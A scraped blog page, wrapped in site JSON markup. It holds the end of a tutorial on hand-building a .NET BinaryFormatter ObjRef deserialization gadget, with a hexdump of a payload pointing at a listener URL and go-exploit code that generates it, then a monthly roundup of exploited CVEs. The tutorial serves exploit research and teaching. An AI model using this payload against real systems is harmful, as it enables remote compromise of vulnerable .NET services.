If you look, this is already present in our RecordTypeEnumMap above.",[14603,30744,30731],{"id":30745},"classinfo",[18,30747,30748,30749,30752],{},"Moving on to the ",[47,30750,30731],{"href":30729,"rel":30751},[51]," member, we can model it as a struct like so:",[1354,30754,30757],{"className":30755,"code":30756,"language":1359},[1357],"type ClassInfo struct {\n ObjectID int          \u002F\u002F A value represented as an INT32\n Name string           \u002F\u002F LengthPrefixedString\n MemberCount int       \u002F\u002F should be equal to len(MemberNames); this could also just be computed in the RecordToBin() method\n MemberNames []string  \u002F\u002F Sequence of LengthPrefixedStrings, one per member\n}\n",[886,30758,30756],{"__ignoreMap":219},[14603,30760,30762],{"id":30761},"objectid","ObjectID",[18,30764,30765],{},"The first member of this struct is an Object ID. These are not specific to ClassInfo structures but are actually a part of many other records and structures that compose .NET serialization streams. These are basically used as unique identifiers or even \"addresses\" to reference objects throughout a serialization stream. These generally increment by 1 with each new object added to a stream.",[18,30767,30768,30769,27987],{},"The value for this one, as shown in the dump output above, should be a 1. Represented as a little-endian INT32 (",[886,30770,30771],{},"\"\\x01\\x00\\x00\\x00\"",[14603,30773,30775],{"id":30774},"name","Name",[18,30777,30778,30779,30784,30785,30787],{},"Next is the Name. This is the name of the actual class, though it is not a normal string but is instead a ",[47,30780,30783],{"href":30781,"rel":30782},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F10b218f5-9b2b-4947-b4b7-07725a2c8127",[51],"LengthPrefixedString",". Do not assume this is \"just an int of the length\" — it is encoded in a specific way as defined in the documentation. 
Though for shorter strings this ",[1131,30786,4563],{}," usually come out to simply be something like hex(len(string)).",[18,30789,30790],{},"To make things easier, I will leave the appropriate function for encoding this length below, from our go-exploit dotnet package.",[1354,30792,30795],{"className":30793,"code":30794,"language":1359},[1357],"func Write7BitEncodedInt(value int) []byte {\n var (\n  bs []byte\n  v  = uint(value)\n )\n for v >= 0x80 {\n  bs = append(bs, byte(v|0x80))\n  v >>= 7\n }\n bs = append(bs, byte(v))\n return bs\n}\n",[886,30796,30794],{"__ignoreMap":219},[18,30798,30799,30800,30803,30804,59],{},"The Name for this one is \"System.Exception\", which makes sense, given that this is a system class and we are dealing with a SystemClassWithMembersAndTypes. But do not forget to prefix it with the encoded length (16, which in this case comes out to ",[886,30801,30802],{},"\\x10","), making it: ",[886,30805,30806],{},"\"\\x10System.Exception\"",[14603,30808,30810],{"id":30809},"membercount","MemberCount",[18,30812,30813,30814,59],{},"Next is MemberCount, another INT32 value. As the name suggests, this is the number of members that are defined in the next item in the struct, the MemberNames. As the dump shows, this is a 1, which we know will be represented as ",[886,30815,30771],{},[14603,30817,30819],{"id":30818},"membernames","MemberNames",[18,30821,30822,30823,59],{},"Last in ClassInfo is the array of MemberNames, which is a sequence of LengthPrefixedStrings. These define the member names for the class. Remember we should only expect to read N members from this, where N == MemberCount. 
In this case, the only member name present should be \"ClassName\" with its length prefix in hex: ",[886,30824,30825],{},"\"\\x09\"",[18,30827,30828],{},"So that does it for ClassInfo, but remember that was just one component of the SystemClassWithMembersAndTypes; the next is the MemberTypeInfo, a data structure that exists to provide information ABOUT the members of the class.",[993,30830,30736],{"id":30831},"membertypeinfo",[18,30833,30834,30835,30838],{},"Do not be fooled by how few members are shown in ",[47,30836,30741],{"href":30734,"rel":30837},[51],". This component is probably the source of the most confusion when building these serialization objects by hand, primarily due to \"AdditionalInfos\".",[14603,30840,30842],{"id":30841},"binarytypeenums","BinaryTypeEnums",[18,30844,30845,30846,59],{},"First is BinaryTypeEnums. Per the docs, this is a sequence of single bytes that denote the data TYPE for each member of the class. The attribution of a given type to its corresponding member is derived from the POSITION of the individual BinaryTypeEnum in the sequence relative to the sequence of class members. 
All possible BinaryTypeEnum values ",[47,30847,30850],{"href":30848,"rel":30849},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F054e5c58-be21-4c86-b1c3-f6d3ce17ec72",[51],"are located here",[18,30852,30853],{},"That was probably a bit unclear, so here is an example: suppose a class has three members, someStringOne (String), someStringTwo (String), and someIntThree (Int).",[1354,30855,30858],{"className":30856,"code":30857,"language":1359},[1357],"\u002F\u002F note: this is pseudocode\nclass SomeClass {\n    someStringOne string\n    someStringTwo string\n    someIntThree  int\n}\n",[886,30859,30857],{"__ignoreMap":219},[18,30861,30862],{},"The MemberTypeInfo.BinaryTypeEnums section for that class should simply be: \"\\x01\\x01\\x00\".",[18,30864,30865,30866,30870],{},"This is because according to ",[47,30867,30869],{"href":30848,"rel":30868},[51],"the BinaryTypeEnum values documentation",", \"\\x01\" denotes a string, of which there are two here. The int value, however, is not represented as its own enum value — this is where it gets a tad bit more confusing.",[18,30872,30873,30874,30879,30880,30883],{},"According to these docs, an int value is a primitive type and is therefore defined as a ",[47,30875,30878],{"href":30876,"rel":30877},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F4e77849f-89e3-49db-8fb9-e77ee4bc7214",[51],"PrimitiveTypeEnum"," value. 
So we mark its BinaryTypeEnum value as a \"\\x00\" (Primitive) so that when the stream is read it knows to look at the next section (AdditionalInfos) to determine the ",[1131,30881,30882],{},"actual"," type of this member.",[18,30885,30886],{},"So to recap, our hypothetical \"\\x01\\x01\\x00\" is described as a string (0x01), another string (0x01), and a primitive type (0x00) which we define as an int in the next section, AdditionalInfos.",[14603,30888,30890],{"id":30889},"additionalinfos","AdditionalInfos",[18,30892,30893],{},"This is a data structure that in some class-based records will not be used at all. It is ONLY present if and when one of the BinaryTypeEnums is either Primitive, SystemClass, Class, or PrimitiveArray. An easy way to remember it is to see if any of the BinaryTypeEnums have primitive or class in their names. If the binary type for a given member is anything OTHER than those four, an AdditionalInfos entry is NOT needed for that member. If NONE of the members' BinaryTypeEnums values are primitive- or class-based, then you can omit the AdditionalInfos component entirely.",[18,30895,30896],{},"Depending on whether it is a Primitive, SystemClass, Class, or PrimitiveArray, a different type of value is expected in the AdditionalInfos data structure. Keep in mind also that the values within the AdditionalInfos data are position-correspondent, just like BinaryTypeEnum itself. This means that a given value within the AdditionalInfos section corresponds with the position of the BinaryTypeEnum requiring an AdditionalInfos value to be added.",[18,30898,30899,30900,30903,30904,30907,30908,30911,30912,30914],{},"To clarify further: if you had someStringOne, someIntTwo, someStringThree, and someIntFour, they would have a BinaryTypeEnum section of ",[886,30901,30902],{},"\"\\x01\\x00\\x01\\x00\"",". 
Of those four BinaryTypeEnums, only TWO of them require an AdditionalInfos entry, so the entire AdditionalInfos section for those members would be ",[886,30905,30906],{},"\"\\x08\\x08\""," (0x08 denotes INT32). The first ",[886,30909,30910],{},"\"\\x08\""," would correspond to someIntTwo, and the second ",[886,30913,30910],{}," would correspond to someIntFour; the strings are ignored because they are not a Primitive, PrimitiveArray, SystemClass, or Class BinaryTypeEnum and thus do not need AdditionalInfos for them.",[18,30916,30917,30918,30921],{},"I hope that made sense, because now we will look at the AdditionalInfos section for the SystemClassWithMembersAndTypes from our ObjRef example, which uses a slightly more complicated BinaryType, SystemClass, as denoted by the ",[886,30919,30920],{},"\"\\x03\""," in the BinaryTypeEnums section. To aid the reader, this BinaryTypeEnum is located at offset 0x35 of the CyberChef dump.",[18,30923,30924,30925,30928],{},"If we look at the ",[47,30926,30736],{"href":30734,"rel":30927},[51]," documentation again, specifically at the AdditionalInfos section, we see the following sentence: \"For the BinaryTypeEnum value of SystemClass, this field specifies the name of the class (2)\". So that means slap a string in there, and of course it must be a LengthPrefixedString, not just a string by itself.",[18,30930,30931,30932,30934,30935,30938,30939,30942,30943,30946],{},"So just to summarize, the BinaryTypeEnums section for this SystemClassWithMembersAndTypes's MemberTypeInfo section is ",[886,30933,30920],{},". Immediately following that, we start the AdditionalInfos if needed. Because the BinaryTypeEnums section contains a SystemClass BinaryTypeEnum, we DO need to provide an AdditionalInfos section, which in this case must be the name for the system class. 
Therefore, the AdditionalInfos section for this SystemClassWithMembersAndTypes's MemberTypeInfo section would be the prefix ",[886,30936,30937],{},"\"\\x1e\"",", followed immediately by ",[886,30940,30941],{},"\"System.Runtime.Remoting.ObjRef\"",". If there ",[1131,30944,30945],{},"were"," more Primitive or Class-based BinaryTypeEnums defined in the BinaryTypeEnums section of this MemberTypeInfo, then AdditionalInfos entries would immediately follow this LengthPrefixedString.",[14603,30948,30950],{"id":30949},"member-values","Member Values",[18,30952,30953],{},"Great, so we have exhausted all of the members for SystemClassWithMembersAndTypes, which ends at offset 0x54. So what is all the stuff after it in the CyberChef hexdump output?",[18,30955,30956,30957,30960],{},"Well, we know that the ",[47,30958,30702],{"href":30700,"rel":30959},[51]," has ended because we made all of the sections per the defined specification. When a record ends in a serialization stream, the next byte is generally a new record; therefore the RecordTypeEnumeration documentation must be consulted. But something else that has not been revealed thus far and is not described well in the relevant Microsoft documentation: when a MemberTypeInfo ends, what generally follows immediately after is the VALUE for those defined members, one after another in a sequence.",[18,30962,30963,30964,30967,30968,30970,30971,30975],{},"Knowing that, we can assume that the next record is the VALUE for the members we just defined. According to the ",[47,30965,30581],{"href":30472,"rel":30966},[51]," documentation, the next byte, a ",[886,30969,30825],{}," (offset 0x55), is a ",[47,30972,13649],{"href":30973,"rel":30974},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Feef0aa32-ab03-4b6a-a506-bcdfc10583fd",[51]," record. 
If you remember above where I talked about ObjectIDs, this is where the primary record references those.",[18,30977,30978],{},"If you look at the documentation for the MemberReference.IdRef section, it says that the ObjectID can be for an object that comes after OR before the referencing record. If we said the ObjectID is like a memory address of an object, you can think of the MemberReference as a pointer to these objects — this way, if that object is referenced multiple times, you do not need to redefine the entire object record but can instead just provide a MemberReference record to an already defined object, which is only 5 bytes rather than the size of an entirely new object.",[1354,30980,30983],{"className":30981,"code":30982,"language":1359},[1357],"type MemberReferenceRecord struct {\n    RecordTypeEnum int \u002F\u002F 1 BYTE, ALWAYS a 0x09\n    IDRef int          \u002F\u002F 4 BYTES - INT32 value containing the ObjectID that is being referenced\n}\n",[886,30984,30982],{"__ignoreMap":219},[18,30986,30987,30988,30990,30991,30994,30995,30998],{},"Given that the only previous object we defined (the \"System.Exception\" SystemClassWithMembersAndTypes) has an ObjectID of 1, we can assume the referenced object will come AFTER this record in the serialization stream. This assumption holds, as the very next record ",[1131,30989,4563],{}," have an ObjectID of ",[886,30992,30993],{},"\"\\x02\""," and it should be familiar since it is another SystemClassWithMembersAndTypes. 
To clarify, the VALUE for the only member in the previously defined SystemClassWithMembersAndTypes ultimately points to ",[1131,30996,30997],{},"yet another"," SystemClassWithMembersAndTypes.",[993,31000,31002],{"id":31001},"systemclasswithmembersandtypes-2","SystemClassWithMembersAndTypes #2",[18,31004,31005],{},"Again, here is the full dump for easier reference:",[1354,31007,31010],{"className":31008,"code":31009,"language":1359},[1357],"00000000  00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00  |.....ÿÿÿÿ.......|\n00000010  00 04 01 00 00 00 10 53 79 73 74 65 6d 2e 45 78  |.......System.Ex|\n00000020  63 65 70 74 69 6f 6e 01 00 00 00 09 43 6c 61 73  |ception.....Clas|\n00000030  73 4e 61 6d 65 03 1e 53 79 73 74 65 6d 2e 52 75  |sName..System.Ru|\n00000040  6e 74 69 6d 65 2e 52 65 6d 6f 74 69 6e 67 2e 4f  |ntime.Remoting.O|\n00000050  62 6a 52 65 66 09 02 00 00 00 04 02 00 00 00 1e  |bjRef...........|\n00000060  53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 52  |System.Runtime.R|\n00000070  65 6d 6f 74 69 6e 67 2e 4f 62 6a 52 65 66 01 00  |emoting.ObjRef..|\n00000080  00 00 03 75 72 6c 01 06 03 00 00 00 20 68 74 74  |...url...... htt|\n00000090  70 3a 2f 2f 31 39 32 2e 31 36 38 2e 35 31 2e 31  |p:\u002F\u002F192.168.51.1|\n000000a0  35 3a 38 38 38 38 2f 68 63 51 61 41 54 0b        |5:8888\u002FhcQaAT.|\n",[886,31011,31009],{"__ignoreMap":219},[18,31013,31014],{},"Our new record begins at offset 0x5A.",[18,31016,31017,31018,31020],{},"I will not rehash everything since we have already defined a very similar record, but I ",[1131,31019,13641],{}," define the values in case there is confusion. 
You could also stop here and try to make it yourself if that sounds like fun to you.",[22,31022,31023,31029,31036,31045,31050,31060,31067],{},[25,31024,31025,31026],{},"SystemClassWithMembersAndTypes.RecordTypeEnum = 4 ",[886,31027,31028],{},"\"\\x04\"",[25,31030,31031,31032,31035],{},"SystemClassWithMembersAndTypes.ClassInfo.ObjectID = 2 ",[886,31033,31034],{},"\"\\x02\\x00\\x00\\x00\"",". This should look familiar from the immediately preceding MemberReference record.",[25,31037,31038,31039,13858,31042,31044],{},"SystemClassWithMembersAndTypes.ClassInfo.Name = lenPrefix ",[886,31040,31041],{},"\\x1e",[886,31043,30941],{},". This should also look familiar from the AdditionalInfos section of Object 1.",[25,31046,31047,31048],{},"SystemClassWithMembersAndTypes.ClassInfo.MemberCount = 1 ",[886,31049,30771],{},[25,31051,31052,31053,31056,31057],{},"SystemClassWithMembersAndTypes.ClassInfo.MemberNames = lenPrefix ",[886,31054,31055],{},"\\x03"," followed by the string: ",[886,31058,31059],{},"\"url\"",[25,31061,31062,31063,31066],{},"SystemClassWithMembersAndTypes.MemberTypeInfo.BinaryTypeEnums = ",[886,31064,31065],{},"\"\\x01\"",". States that the only member for this class is of type string.",[25,31068,31069],{},"SystemClassWithMembersAndTypes.MemberTypeInfo.AdditionalInfos = \"\", nothing for this as we do not need it; none of the BinaryTypeEnums are Class- or Primitive-based, all we have is a string.",[18,31071,31072,31073,31076],{},"Those are all of the values for all of the components of ",[1131,31074,31075],{},"that"," object, but as we know, we defined one member; therefore, we must provide one member value immediately following the SystemClassWithMembersAndTypes, and because this is a serialization stream, we cannot simply have random values floating around in the stream. 
All things must be defined in a RECORD since, once again, a serialization stream is a sequence of records.",[18,31078,31079,31080,31082,31083,31088],{},"With all of that said, the member type that we defined is of BinaryTypeEnum ",[886,31081,31065],{},", which is a string. So how do we represent a string as a record? Using the next record in the dump, a ",[47,31084,31087],{"href":31085,"rel":31086},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Feb503ca5-e1f6-4271-a7ee-c4ca38d07996",[51],"BinaryObjectString",", defined below.",[993,31090,31087],{"id":31091},"binaryobjectstring",[1354,31093,31096],{"className":31094,"code":31095,"language":1359},[1357],"type BinaryObjectString struct {\n    RecordTypeEnum int \u002F\u002F 1 BYTE - ALWAYS 0x06\n    ObjectID int       \u002F\u002F 4 BYTES - INT32. This is a record, therefore it needs an ObjectID in case it needs to be referenced\n    Value string       \u002F\u002F This needs to be a LengthPrefixedString. This contains the value for the string.\n}\n",[886,31097,31095],{"__ignoreMap":219},[18,31099,31100],{},"So immediately following that SystemClassWithMembersAndTypes (Object 2), we define the next object in the stream as such:",[22,31102,31103,31106,31112],{},[25,31104,31105],{},"BinaryObjectString.RecordTypeEnum = 0x06",[25,31107,31108,31109],{},"BinaryObjectString.ObjectID = ",[886,31110,31111],{},"\"\\x03\\x00\\x00\\x00\"",[25,31113,31114,31115,31118,31119],{},"BinaryObjectString.Value = lenPrefix ",[886,31116,31117],{},"\"\\x20\""," followed by ",[886,31120,31121],{},"\"http:\u002F\u002F192.168.51.15:8888\u002FhcQaAT\"",[18,31123,31124,31125,31130,31131,31134],{},"Then we end the entire serialization stream using the ",[47,31126,31129],{"href":31127,"rel":31128},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fde6a574b-c596-4d83-9df7-63c0077acd32",[51],"MessageEnd Record",". 
This is the simplest record of all: it is just a ",[886,31132,31133],{},"\\x0B"," that denotes the end of the stream.",[993,31136,31138],{"id":31137},"gadget-complete","Gadget Complete",[18,31140,31141,31142,31145],{},"With all of the structs defined, and the process for understanding them under wraps, all that is left is to define a method similar to the ",[886,31143,31144],{},"RecordToBin()"," shown in the earlier example for each of the discussed records and then concatenate those results in the same order as the dump. This is left as an exercise for the reader.",[61,31147,31149],{"id":31148},"using-the-new-go-exploit-deserialization-library","Using the new Go-Exploit deserialization library",[18,31151,31152,31153,31156],{},"You could also use our ",[47,31154,20558],{"href":30688,"rel":31155},[51]," library as a reference or for gadget generation. Also, do note that this was a rather small serialization stream example; there are much more complicated gadgets, some of which contain serialization streams as values inside of other serialization stream records. Even so, construction of those should all follow the same basic principles explained in this article.",[993,31158,31160],{"id":31159},"usage","Usage",[18,31162,31163],{},"Using VulnCheck's go-exploit library to generate the ObjRef payload is as simple as:",[1354,31165,31168],{"className":31166,"code":31167,"language":1359},[1357],"package main\nimport (\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fdotnet\"\n)\nfunc main() {\n payload := dotnet.CreateObjectRef(\"something\", dotnet.BinaryFormatter) \u002F\u002F gadget generated!\n sendPayload(payload) \u002F\u002F sendPayload is a placeholder for your own delivery code, not part of go-exploit\n}\n",[886,31169,31167],{"__ignoreMap":219},[61,31171,31173],{"id":31172},"more-to-come","More to Come",[18,31175,31176,31177,31181],{},"go-exploit provides a simple and efficient way to develop sophisticated and portable exploits. 
If you are interested in contributing to go-exploit or have feedback on your own experience developing exploits, we would love to hear from you! Visit ",[47,31178,31180],{"href":14297,"rel":31179},[51],"go-exploit on GitHub"," to get involved.",[61,31183,202],{"id":201},[1308,31185],{},[18,31187,1228,31188,1234,31191,1240,31194,1246,31197,1255,31200,1260],{},[47,31189,1233],{"href":10806,"rel":31190},[51],[47,31192,1239],{"href":1237,"rel":31193},[51],[47,31195,1245],{"href":1243,"rel":31196},[51],[47,31198,1251],{"href":1249,"rel":31199},[51],[47,31201,216],{"href":1258,"rel":31202},[51],[18,31204,31205],{},"EOF",{"title":219,"searchDepth":220,"depth":220,"links":31207},[31208,31209,31210,31211,31219,31222,31223],{"id":30400,"depth":220,"text":30401},{"id":13191,"depth":220,"text":13194},{"id":30438,"depth":220,"text":30439},{"id":30462,"depth":220,"text":30463,"children":31212},[31213,31214,31215,31216,31217,31218],{"id":30484,"depth":1266,"text":30485},{"id":30693,"depth":1266,"text":30694},{"id":30831,"depth":1266,"text":30736},{"id":31001,"depth":1266,"text":31002},{"id":31091,"depth":1266,"text":31087},{"id":31137,"depth":1266,"text":31138},{"id":31148,"depth":220,"text":31149,"children":31220},[31221],{"id":31159,"depth":1266,"text":31160},{"id":31172,"depth":220,"text":31173},{"id":201,"depth":220,"text":202},"2025-11-12","Creating a language-native .NET source for deserialization 
gadgets",{"slug":31227},"making-dotnet-gadgets","\u002Fblog\u002Fmaking-dotnet-gadgets",{"title":30393,"description":31225},"blog\u002Fmaking-dotnet-gadgets",[1281,14365,14366],"zWEmgIrOMVxfJBOr6cNL0sAssRGbXNkl0U4O4fuKbGk",{"id":31234,"title":29960,"articles":7,"authors":31235,"body":31237,"date":31566,"description":31567,"extension":234,"image":7,"link":7,"meta":31568,"navigation":237,"path":31570,"seo":31571,"series":7,"stem":31572,"subtype":7,"tags":31573,"__hash__":31574},"blog\u002Fblog\u002Fnovember-2025-research-highlights.md",[31236],{"name":256,"link":258,"avatar":257,"linkName":29813},{"type":15,"value":31238,"toc":31558},[31239,31245,31249,31289,31292,31318,31322,31335,31342,31353,31362,31366,31379,31385,31402,31413,31416,31450,31454,31461,31467,31470,31484,31487,31513,31523,31525,31541],[18,31240,31241,31242,59],{},"Welcome to another edition of VulnCheck’s monthly research highlights. This past month saw in-the-wild exploitation of plenty of new vulnerabilities, including several that alarmed global incident response teams. A good chunk of new Known Exploited Vulnerabilities (KEVs) come from VulnCheck Canaries, which are live, vulnerable production systems that identify real-world exploitation firsthand. Finally, VulnCheck’s CNA team hit a major milestone that has long-term benefits for the security community. Want more? Read VulnCheck’s October Research Highlights ",[47,31243,305],{"href":30351,"rel":31244},[51],[61,31246,31248],{"id":31247},"latest-emerging-threats","Latest Emerging Threats",[18,31250,31251,31252,31257,31258,31263,31264,31268,31269,11496,31273,10515,31278,10515,31283,31288],{},"The top story among late October emerging threats is likely ",[47,31253,31256],{"href":31254,"rel":31255},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59287",[51],"CVE-2025-59287",", a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) arising from a deserialization of untrusted data issue. 
The vulnerability was patched in an ",[47,31259,31262],{"href":31260,"rel":31261},"https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Ftopic\u002Foctober-23-2025-kb5070883-os-build-17763-7922-out-of-band-860bc03c-52fb-407c-89b2-14ecf4893c5c",[51],"out-of-band update"," on October 23 after its original Patch Tuesday fix was, apparently, incomplete. Proof-of-concept exploit code has been ",[47,31265,25096],{"href":31266,"rel":31267},"https:\u002F\u002Fhawktrace.com\u002Fblog\u002FCVE-2025-59287",[51]," since October 17, and a variety of ",[47,31270,11495],{"href":31271,"rel":31272},"https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2025\u002F10\u002F29\u002Fwindows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data\u002F",[51],[47,31274,31277],{"href":31275,"rel":31276},"https:\u002F\u002Fadvisories.ncsc.nl\u002F2025\u002Fncsc-2025-0310.html",[51],"reported",[47,31279,31282],{"href":31280,"rel":31281},"https:\u002F\u002Fwww.darktrace.com\u002Fblog\u002Fwsus-exploited-darktraces-analysis-of-post-exploitation-activities-related-to-cve-2025-59287",[51],"ongoing",[47,31284,31287],{"href":31285,"rel":31286},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fexploitation-of-windows-server-update-services-remote-code-execution-vulnerability",[51],"exploitation"," in the wild. 
VulnCheck researchers spotted between 2,500 and 6,000 WSUS servers exposed to the public internet.",[18,31290,31291],{},"Other vulnerabilities VulnCheck’s research team is watching include:",[22,31293,31294,31302,31310],{},[25,31295,31296,31301],{},[47,31297,31300],{"href":31298,"rel":31299},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-11371",[51],"CVE-2025-11371",": Gladinet CentreStack and TrioFox unauthenticated local file inclusion, exploited since October 9",[25,31303,31304,31309],{},[47,31305,31308],{"href":31306,"rel":31307},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-54236",[51],"CVE-2025-54236",": Adobe Commerce and Magento improper input validation, exploited since October 21",[25,31311,31312,31317],{},[47,31313,31316],{"href":31314,"rel":31315},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-49844",[51],"CVE-2025-49844",": Redis use-after-free, PoC available; our research team assesses this vulnerability is unlikely to be used at scale, but exploit code availability increases the chances of seeing exploit attempts in the wild",[61,31319,31321],{"id":31320},"new-vulncheck-kevs","New VulnCheck KEVs",[18,31323,31324,31325,31328,31329,31334],{},"The VulnCheck team added ",[295,31326,31327],{},"95"," new vulnerabilities to VulnCheck KEV in October 2025, the vast majority of which (80 CVEs) were not yet on CISA KEV as the month ended. 
CISA added 31 CVEs to CISA KEV in October, 21 of which had been previously incorporated into VulnCheck KEV (e.g., Adobe Experience Manager ",[47,31330,31333],{"href":31331,"rel":31332},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-54253",[51],"CVE-2025-54253",", which was added to VulnCheck KEV in August).",[18,31336,31337],{},[68,31338],{"alt":31339,"src":31340,"style":31341},"Earliest exploitation in the wild reports","blog\u002Fnovember-research-highlights\u002Fearliest-reporters-of-exploitation-in-the-wild-october-2025.png","width: 65%; height: auto; margin-left: auto; margin-right: auto;",[18,31343,31344,31345,31348,31349,59],{},"Following the mid-October rollout of VulnCheck Canaries, canary-observed exploit activity resulted in 25 new VulnCheck KEVs, 22 of which had no prior publicly reported exploitation evidence. As of November 3, VulnCheck ",[47,31346,283],{"href":920,"rel":31347},[51]," includes in-the-wild detections of more than 220 CVEs, just over half of which (113) are on CISA KEV. More than 40 of the CVEs observed in the wild are known to be exploited by ransomware groups. Read more ",[47,31350,31352],{"href":29746,"rel":31351},[51],"Canary stats here",[18,31354,31355,10515,31358,31361],{},[295,31356,31357],{},"Want alerts about known exploited vulnerabilities earlier in the exploit lifecycle?",[47,31359,1233],{"href":1231,"rel":31360},[51]," is free!",[993,31363,31365],{"id":31364},"vulncheck-observed-canary-exploitation","VulnCheck-Observed Canary Exploitation",[18,31367,31368,31369,31374,31375,31378],{},"In February 2025, VulnCheck’s Initial Access Intelligence team shipped an exploit for a code injection flaw in XWiki, an open-source alternative to enterprise knowledge-sharing platforms like Atlassian Confluence. 
At the time, ",[47,31370,31373],{"href":31371,"rel":31372},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-02-28#cve-2025-24893-xwiki-solr-search-code-injection",[51],"the team wrote"," about ",[47,31376,30050],{"href":30048,"rel":31377},[51],": “We expect this to be exploited in the wild in the future due to ease of exploitation and number of targets online.”",[18,31380,31381],{},[68,31382],{"alt":31383,"src":31384},"VulnCheck exploited vulnerability timeline CVE-2025-24893","blog\u002Fnovember-research-highlights\u002Fvuln-check-timeline-cve-2025-24893.png",[18,31386,31387,31388,31392,31393,31397,31398,59],{},"As expected, CVE-2025-24893 was added to VulnCheck KEV in Q1 of this year, and that was that — or not, as it turns out. A few weeks ago, VulnCheck Canaries began detecting a two-stage attack originating from Vietnam that dropped a coinminer on victim systems. FOFA still ",[47,31389,14466],{"href":31390,"rel":31391},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iZGF0YS14d2lraS0i",[51]," more than 6,000 XWiki installations on the public internet. CVE-2025-24893 was added to CISA KEV on October 30, 2025. Read ",[47,31394,31396],{"href":19426,"rel":31395},[51],"more about XWiki exploitation",", including payload analysis and IOCs, from VulnCheck CTO ",[47,31399,10391],{"href":31400,"rel":31401},"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjacob-baines-1490a7189\u002F",[51],[18,31403,31404,31405,31408,31409,59],{},"VulnCheck Canaries also unearthed exploitation of another notable issue in October: An unauthenticated command injection vulnerability in call center software ICTBroadcast, tracked as ",[47,31406,23717],{"href":23715,"rel":31407},[51],". The vulnerability, which had no prior evidence of exploitation in the wild, was leveraged in a two-phase attack that attempted to establish a reverse shell on victim systems. 
VulnCheck Canaries are still detecting regular exploit attempts for CVE-2025-2611, which at time of writing is not yet on CISA KEV. Details and IOCs ",[47,31410,31412],{"href":24024,"rel":31411},[51],"are here",[18,31414,31415],{},"Other notable CVEs VulnCheck Canaries have observed in the wild since mid-October:",[22,31417,31418,31426,31434,31442],{},[25,31419,31420,31425],{},[47,31421,31424],{"href":31422,"rel":31423},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-6235",[51],"CVE-2024-6235",": Citrix NetScaler Console sensitive information disclosure",[25,31427,31428,31433],{},[47,31429,31432],{"href":31430,"rel":31431},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-34124",[51],"CVE-2023-34124",": SonicWall GMS and Analytics Web Services authentication bypass",[25,31435,31436,31441],{},[47,31437,31440],{"href":31438,"rel":31439},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-23917",[51],"CVE-2024-23917",": JetBrains TeamCity authentication bypass",[25,31443,31444,31449],{},[47,31445,31448],{"href":31446,"rel":31447},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-20419",[51],"CVE-2024-20419",": Cisco Smart Software Manager unverified password change",[61,31451,31453],{"id":31452},"vulncheck-cna-cves-for-the-cve-gods","VulnCheck CNA: CVEs for the CVE Gods",[18,31455,31456,31457,31460],{},"As a high-volume research CNA (CVE Numbering Authority), VulnCheck assigned ",[295,31458,31459],{},"162"," new CVEs in October for vulnerabilities lacking CVE identifiers, including 13 vulnerabilities with exploitation evidence.",[18,31462,31463],{},[68,31464],{"alt":31465,"src":31466,"style":31341},"VulnCheck CNA activity October 2025","blog\u002Fnovember-research-highlights\u002Fvuln-check-cna-activity-november-2025.png",[18,31468,31469],{},"VulnCheck CNA assigns CVEs for vulnerabilities discovered across a variety of audit and exploit research projects. 
October’s breakdown:",[22,31471,31472,31475,31478,31481],{},[25,31473,31474],{},"Nagios vulnerability audit: 97 CVEs",[25,31476,31477],{},"Reported to VulnCheck by security researchers: 42 CVEs",[25,31479,31480],{},"Detected by VulnCheck Canaries: 10 CVEs",[25,31482,31483],{},"Other exploitation research: 13 CVEs",[18,31485,31486],{},"VulnCheck has roughly a dozen coordinated vulnerability disclosure (CVD) projects in flight at any given time for vulnerabilities reported to us by third-party researchers. Our team has disclosed a number of neat finds from the research community over the past month, including:",[22,31488,31489,31497,31505],{},[25,31490,31491,31492],{},"8 mixed severity issues, including several critical vulnerabilities, in Ilevia EVE X1 Server 4.7.18.0.eden discovered by Gjoko Krstic of ",[47,31493,31496],{"href":31494,"rel":31495},"https:\u002F\u002Fwww.zeroscience.mk\u002Fen\u002Fvulnerabilities\u002F",[51],"Zero Science Lab",[25,31498,31499,31500,2230],{},"18 separate high- and medium-severity issues in IPFire \u003C 2.29 discovered by Alex Williams of Pellera Technologies (e.g., ",[47,31501,31504],{"href":31502,"rel":31503},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fipfire-command-injection-via-proxy-report-creation",[51],"CVE-2025-34311",[25,31506,31507,31512],{},[47,31508,31511],{"href":31509,"rel":31510},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fopenplc-runtime-v3-persistent-denial-of-service",[51],"CVE-2025-34226",": OpenPLC 